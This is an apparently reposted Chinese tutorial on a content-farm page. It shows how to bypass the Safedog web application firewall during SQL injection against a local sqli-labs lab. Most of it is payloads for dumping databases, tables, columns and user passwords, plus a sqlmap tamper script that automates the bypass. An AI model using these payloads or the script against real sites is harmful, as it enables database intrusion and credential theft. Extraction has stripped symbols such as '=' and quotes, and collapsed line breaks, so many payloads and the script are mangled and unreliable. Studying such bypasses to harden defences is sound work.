当前位置: 首页 > news >正文

做网站要多少钱呀购物商城外贸网站建设

做网站要多少钱呀,购物商城外贸网站建设,衡水自助建站系统,wordpress如何添加安装导航前言 SQL注入并不是很精通#xff0c;通过实战绕过WAF来进行加强SQL注入能力#xff0c;希望对正在学习的师傅能有一丝帮助。 安装 安装前言 我是本地搭建的环境进行测试的 环境是windows11phpstudy2018sqli-labs phpstudy的安装我不再复述#xff0c;这里简单说一下安全…前言 SQL注入并不是很精通通过实战绕过WAF来进行加强SQL注入能力希望对正在学习的师傅能有一丝帮助。 安装 安装前言 我是本地搭建的环境进行测试的 环境是windows11phpstudy2018sqli-labs phpstudy的安装我不再复述这里简单说一下安全狗插件和安全狗的安装。 过程 在安装安全狗之前一定要先做好安装apache2.4这一项否则可能要浪费半个下午的时间来整(受害者本人自述了属于是)因为在提前安装好这个后再安装安全狗就会出现如下图所示的情况这时候就很容易进行配置了 而如果你后安装apache2.4出现Apache插件安装失败的可能性极大那我们要怎么安装apache2.4呢很简单首先找到你apache下的bin路径我的是D:\phpStudy\PHPTutorial\Apache\bin然后进入cmd中(以管理员身份运行) C:\Windows\system32d: ​ D:\cd D:\phpStudy\PHPTutorial\Apache\bin ​ D:\phpStudy\PHPTutorial\Apache\bin httpd -k install -n apache2.4 //安装插件 此时插件的安装就完成了直接去官网找Apache版本的安全狗 下载到本地即可此时进行安装(不要开启phpstudy)此时选择好安装路径后就会出现配置界面它安装过插件的话一般是会自动检测的 此时直接点击确定就好了然后打开就会发现插件是已安装的 此时看安全狗这个网站安全狗与防护总开关是否都开启只有都开启了才有效此时再去打开phpstudy一般他就应该是自己变成系统服务了如果没变的话就再选择一下即可 然后此时的话这个防护网站变成1个就说明配置好了 去访问网站就可以发现安全狗生效了 构造11 方法一 首先这里的话是尝试一个11发现是不可以的 更换成truetrue进行尝试 仍然不行此时发现当and和后面没有空格的时候就会报错 我们这里尝试用/*/来充当注释符 发现还是被过滤了此时我们就利用bp来进行fuzz抓包后在/*/中添加变量为爆破做准备 选择暴力破解字符集就选/!*进行测试即可 得到结果 发现很多都可以充当空格来进行绕过我们随意挑选一个进行尝试构造payload如下 id1 and/**/1 -- 成功绕过 方法二 当然常见的还有一个内联注释符就是/*!00000*/这种的用实例来解释是最好理解的 mysql select version; ----------- | version | ----------- | 5.5.53    | ----------- 1 row in set (0.00 sec) ​ mysql select /*!999991*/; ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1 ​ mysql select /*!000001*/; --- | 1 | --- | 1 | --- 1 row in set (0.00 sec) ​ mysql select /*!1*/; --- | 1 | --- | 1 | --- 1 row in set (0.00 sec) ​ mysql select /*!505531*/; --- | 1 | --- | 1 | --- 1 row in set (0.00 sec) ​ mysql select /*!505541*/; ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1 这种注释在mysql中叫做内联注释如果没有接版本号时会直接执行里面内容。当!后面接数据库版本号时如果自身版本号(上述例子中的5.5.53)大于等于字符数(例如上述例子中的99999和00000)就会将注释中的内容执行否则就会当做注释来处理。 那么这里的话我们就想构造11就可以利用它来进行绕过我们构造如下/*!000001*//*!000001*/语句尝试进行绕过 可以发现成功绕过了 order by 绕过 直接利用的话可以发现是不可以的 由11的构造思路我们尝试构造空格来进行绕过构造payload如下 id1 order/**/by 3 -- id1 order/**/by 4 -- 成功判断出来了字段数为3 联合查询 首先的话是想利用内联注释来进行一个绕过因为单独的一个union和单独的select都是可以的此时我就想利用它内联注释字符数大于版本号时将其内语句作为注释来进行一个绕过 测试过程如下 选择暴力破解设置0-9依次进行爆破 而后得到结果 发现这种利用垃圾字符的内联注释方式无法再次绕过此时我们去尝试进行其他方法想到之前的fuzz/**/中间加东西可以绕过不妨试一下这种设置如下 选择暴力破解将字符集进行更换即可 得到结果 发现有很多可以绕过的随便选一个来进行测试构造payload如下 id-1 union/*/!*!**/select 1,2,3-- 可以发现正常执行了说明绕过了这里再给出几个payload师傅们可以自行测试 id-1 union/*//--**/select 1,2,3-- id-1 union/*/!--**/select 1,2,3-- id-1 union/*/-*!!*/select 1,2,3-- 爆库 方法一(/**/方法) 此时直接去将3变成database()会被绕过此时我是想用/*xxx*/()这种方式来进行绕过利用bp设置如下 而后如下设置暴力破解 得到结果 可以发现有很多方式我们随便挑选一个进行测试 id-1 union/*/!*!**/select 1,2,database/*///-*/()-- 成功绕过 方法二(/*!*/内联注释法) 我们设置payload为/*!()*/这种利用bp在括号前面加上五个数字依次来检验哪个可以进行绕过具体设置如下 而后选暴力破解设置如下 得到结果 随机取出一个进行测试构造payload如下 id-1 union/*/!*!**/select 1,2,database/*!20553()*/-- 成功绕过 爆表 正常的话语句一般是这个样子 group_concat(table_name) from information_schema.tables where table_schemadatabase() 那么这里的话我们测试过后就会发现information_schema被过滤了它俩只要在一起挨着就会被过滤 同时呢我们也发现利用from的时候也会被过滤 对这两个进行分别fuzz的话比较麻烦而且将两者进行一起用时可能会出现仍然被过滤的情况因此此时的话就自然的想到了内联注释这种方法可不可以用这种方法来进行绕过呢我们先尝试一下 from/*!information_schema.tables*/ 结果如下 显然这种是不可行的但是我们知道还有一种的话就是内联注释的利用方法就是中间加注释符再加换行也就是/*!%23%0a*/这种形式我们先进行本地测试 mysql select /*!#- 1*/; --- | 1 | --- | 1 | --- 1 row in set (0.00 sec) mysql select /*!#/*- 1*/- ; --- | 1 | --- | 1 | --- 1 row in set (0.00 sec) 此时经过本地测试发现当运用内联注释时里面插入/*来构造/**/也是可以实现绕过的此时我们先试本地测试的第一种方法 ?id-1 union/*/!*!**/select%201,2,group_concat(table_name)from/*!%23%0ainformation_schema.tables*/ where table_schemasecurity-- 此时被绕过那我们就用刚刚测试出来的第二种方法进行尝试 ?id-1 union/*/!*!**/select%201,2,group_concat(table_name)from/*!%23/*%0ainformation_schema.tables*/ where table_schemasecurity-- 此时想有没有可能是过滤了%23,我们将%23换成-- 构造payload如下 ?id-1 union/*/!*!**/select%201,2,group_concat(table_name)from/*!--/*%0ainformation_schema.tables*/ where table_schemasecurity-- 得到了全部表 爆列 有了表名的注入那么注入列名也不是件太难的事情修改一下语句即可构造payload如下 ?id-1 union/*/!*!**/select%201,2,group_concat(column_name)from/*!--/*%0ainformation_schema.columns*/ where table_nameusers-- 爆字段信息 同理修改语句即可 ?id-1 union/*/!*!**/select%201,2,group_concat(id,password)from/*!--/*%0ausers*/-- 其他姿势 like[%23] 在学习其他师傅的文章时偶然间发现这个like[%23]这个的话我们知道%23是注释符的含义那么在这里的时候它这个语句到底有什么作用呢我们测试一下就知道了 首先先正常查一个字段信息 select * from users where id1 ; 此时可以发现有一个结果我们加上我们的like[%23]构造payload如下 select * from users where id1 like [%23]; 此时表变成空的了那我们如果此时这样构造payload select * from users where id1 like [%23] union select * from users; 我们知道前面users where id1 like [%23]这个是空那它这条语句就相当于 select * from users 如下图所示 那么此时我们就可以去我们的靶场进行测试看是否能绕过 id-1 like [%23] /*!10440union select*/ 1,2,3 -- 发现没有绕过此时我们将union后的空格用换行符替代 id-1 like [%23] /*!10440union%0aselect*/ 1,2,3 -- 此时就可以注入了因此新的姿势就出现了其他具体的不再列举这里给出payload //爆库 id-1 like [%23] /*!10440union%0aselect*/ 1,2,database/*!--/*%0a()*/ -- //爆表 id-1 like [%23] /*!10440union%0aselect*/ 1,2,group_concat(table_name)from/*!--/*%0ainformation_schema.tables */where table_schemasecurity-- //爆列 id-1 like [%23] /*!10440union%0aselect*/ 1,2,group_concat(column_name)from/*!--/*%0ainformation_schema.columns */where table_nameusers-- //爆字段 id-1 like [%23] /*!10440union%0aselect*/ 1,2,group_concat(id,username,password)from/*!--/*%0ausers*/-- tamper脚本 脚本如下 #!/usr/bin/env python Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/) See the file LICENSE for copying permission Author:quan9i.top import re #导入re模块 import os #导入os模块from lib.core.data import kb #导入sqlmap中lib\core\data中的kb函数,测试SQL注入的过程中,使用的配置文件事先全部被加载到了conf和kb from lib.core.enums import PRIORITY #导入sqlmap中lib\core\enums中的PRIORITY函数LOWEST -100,LOWER -50,LOW -10,NORMAL 0,HIGH 10,HIGHER 50,HIGHEST 100 from lib.core.common import singleTimeWarnMessage#输出到sqlmap控制台的函数 from lib.core.enums import DBMS#一个数据库的枚举 __priority__ PRIORITY.LOW#定义优先级为LOWdef dependencies():singleTimeWarnMessage(Bypass safedog by pureqh%s only %s % (os.path.basename(__file__).split(.)[0], DBMS.MYSQL))# singleTimeWarnMessage() 用于在控制台中打印出警告信息 def tamper(payload, **kwargs):payloadpayload.replace(AND,/*!10000AND*/)payloadpayload.replace(OR,/*!10000OR*/)payloadpayload.replace(ORDER BY,ORDER/**/BY)payloadpayload.replace((),/*!20553()*/)payloadpayload.replace(UNION SELECT,UNION/*/!*!**/SELECT)payloadpayload.replace(information_schema.tables,/*!%23%0ainformation_schema.tables*/)return payload 示例如下 //检测可注入类型 python sqlmap.py -u http://127.0.0.1:81/sqli-labs-master/Less-1/?id1 --tamperdog 破解数据库 python sqlmap.py -u http://127.0.0.1:81/sqli-labs-master/Less-1/?id1 --dbs --tamperdog -v5 参考文献 SQL注入bypass最新版安全狗 - 先知社区 什么有狗快跑慢着这次手把手教你怎么过安全狗sql注入篇 - 知乎 https://www.cnblogs.com/Cl0ud/p/14394627.html SQL注入-安全狗apache最新版绕过-腾讯云开发者社区-腾讯云 Python攻防-Fuzz绕过安全狗进行SQL注入_Tr0e的博客-CSDN博客 SQLMap绕过脚本tamperfrom 《Web安全攻防渗透测试实战指南》_Masked5的博客-CSDN博客 记一次艰难的SQL注入(过安全狗) - FreeBuf网络安全行业门户 https://www.cnblogs.com/Cl0ud/p/14493204.html https://www.cnblogs.com/Cl0ud/p/14394627.html 加下方wx拉你一起进群学习
http://www.zqtcl.cn/news/833869/

相关文章:

  • 编写网站 语言微网站开发语言
  • 深圳网站建设优化网站建设与维护培训
  • 张家港网站开发wordpress后台登录地址改
  • 郑州做网站的公司哪家好做网站运营工资是不是很低
  • 做网站电销公司开发个网站怎么做
  • 廊坊做网站哪家好深圳快速网站制
  • 网站开发文档实训小结与讨论做网站建设业务员好吗
  • 网站开发知识产权归属好看的个人网站设计
  • 怎么学习企业网站维护江西省城乡建设培训网站官方网站
  • 电脑网站 源码php网站数据库修改
  • 做网站系统的答辩ppt范文商品关键词优化的方法
  • 长沙网站设计公司怎么样如何在网站上推广自己的产品
  • 龙岗网站设计农业网站模板WordPress
  • 摄像头监控设备企业网站模板聊城网站设计公司
  • 做英文网站賺钱建筑设计资料网站
  • 上海专业网站建设平台百度sem认证
  • 个人房产查询系统网站官网推广普通话 奋进新征程
  • 网站设计理念介绍石家庄业之峰装饰公司怎么样
  • 博乐建设工程信息网站ppt软件下载免费版
  • 宿州公司网站建设企业管理培训课程讲座大全
  • 企业网站营销的优缺点Vs做的网站调试时如何适应网页
  • 策划案网站构成怎么写wordpress建个人博客
  • 自己做的网站别人怎么访问美容行业网站建设多少价格
  • 网站建设与运营 教材 崔海口个人建站模板
  • 做本地网站赚钱吗wordpress桌面宠物
  • 滁州市城市建设投资有限公司网站云服务器里面做网站播放器
  • 做yy头像的网站口碑营销案例简短
  • 卖灯杆的做网站好网页ip代理
  • 做网站开发工具哪个好网络协议分析课程设计报告
  • 如何进行营销型企业网站的优化网站开发有很多种吗